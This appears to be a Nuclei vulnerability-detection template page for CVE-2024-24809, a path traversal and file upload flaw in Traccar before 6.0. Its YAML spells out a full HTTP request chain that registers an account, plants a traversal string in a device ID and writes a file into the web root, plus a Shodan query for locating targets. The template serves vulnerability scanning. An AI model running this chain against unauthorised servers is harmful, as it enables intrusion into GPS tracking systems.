Traccar - Unrestricted File Upload

ID: CVE-2024-24809

Severity: high

Author: DhiyaneshDK

Tags: cve,cve2024,traccar,rce,intrusive,file-upload

Description

Traccar is an open source GPS tracking system. Versions prior to 6.0 are vulnerable to path traversal and unrestricted upload of file with dangerous type. Since the system allows registration by default, attackers can acquire ordinary user permissions by registering an account and exploit this vulnerability to upload files with the prefix device. under any folder. Attackers can use this vulnerability for phishing, cross-site scripting attacks, and potentially execute arbitrary commands on the server. Version 6.0 contains a patch for the issue.

YAML Source

id: CVE-2024-24809

info:
  name: Traccar - Unrestricted File Upload
  author: DhiyaneshDK
  severity: high
  description: |
    Traccar is an open source GPS tracking system. Versions prior to 6.0 are vulnerable to path traversal and unrestricted upload of file with dangerous type. Since the system allows registration by default, attackers can acquire ordinary user permissions by registering an account and exploit this vulnerability to upload files with the prefix `device.` under any folder. Attackers can use this vulnerability for phishing, cross-site scripting attacks, and potentially execute arbitrary commands on the server. Version 6.0 contains a patch for the issue.
  reference:
    - https://github.com/traccar/traccar/commit/b099b298f90074c825ba68ce73532933c7b9d901
    - https://github.com/traccar/traccar/security/advisories/GHSA-vhrw-72f6-gwp5
    - https://nvd.nist.gov/vuln/detail/CVE-2024-24809
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:L
    cvss-score: 8.5
    cve-id: CVE-2024-24809
    cwe-id: CWE-27
    epss-score: 0.00043
    epss-percentile: 0.09551
    cpe: cpe:2.3:a:traccar:traccar:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"Traccar"
    product: traccar
    vendor: traccar
  tags: cve,cve2024,traccar,rce,intrusive,file-upload

variables:
  name: "{{rand_base(6)}}"
  password: "{{rand_base(8)}}"
  email: "{{randstr}}@{{rand_base(5)}}.com"
  unique: "{{rand_base(6)}}"
  str: "{{randstr}}"

flow: http(1) && http(2) && http(3) && http(4) && http(5) && http(6) && http(7)

http:
  - raw:
      - |
        POST /api/users HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"name": "{{name}}", "email": "{{email}}", "password": "{{password}}", "totpKey": null}

    matchers:
      - type: word
        part: body
        words:
          - '"administrator":'
          - '"fixedEmail"'
        condition: and
        internal: true

  - raw:
      - |
        POST /api/session HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded;charset=UTF-8

        email={{email}}&password={{password}}

    matchers:
      - type: word
        part: body
        words:
          - '"deviceReadonly":'
          - '"expirationTime":'
        condition: and
        internal: true

  - raw:
      - |
        POST /api/devices HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"name": "{{unique}}", "uniqueId": "{{unique}}"}

    matchers:
      - type: word
        part: body
        words:
          - '"calendarId"'
          - '"groupId":'
        condition: and
        internal: true

    extractors:
      - type: json
        part: body
        name: value
        internal: true
        json:
          - '.id'

  - raw:
      - |
        POST /api/devices/{{value}}/image HTTP/1.1
        Host: {{Hostname}}
        Content-Type: image/srHtgGrc

        {{str}}

    extractors:
      - type: regex
        part: body
        name: filename
        internal: true
        regex:
          - 'device\.([a-zA-Z]+)'

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(content_type, "application/json")
        condition: and
        internal: true

  - raw:
      - |
        PUT /api/devices/{{value}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"id": {{value}}, "attributes": {"deviceImage": "device.png"}, "groupId": 0, "calendarId": 0, "name": "test", "uniqueId": "{{unique}}/../../../../../opt/traccar/modern", "status": "offline", "lastUpdate": null, "positionId": 0, "phone": null, "model": null, "contact": null, "category": null, "disabled": false, "expirationTime": null}

    matchers:
      - type: word
        part: body
        words:
          - '"deviceImage":'
          - '"expirationTime":'
        condition: and
        internal: true

  - raw:
      - |
        POST /api/devices/{{value}}/image HTTP/1.1
        Host: {{Hostname}}
        Content-Type: image/srHtgGrc

        {{str}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(content_type, "application/json")
        condition: and
        internal: true

  - raw:
      - |
        GET /{{filename}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
# digest: 4a0a00473045022100d76efc5bbc60d2fc6122392231d411beccbf463aee60d33bb8fe106a55c2f6ee0220116c7b098978f4ac3ce46e5a75976a3e2704f633f9d9788d11d28e235155c69c:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-24809.yaml"

View on Github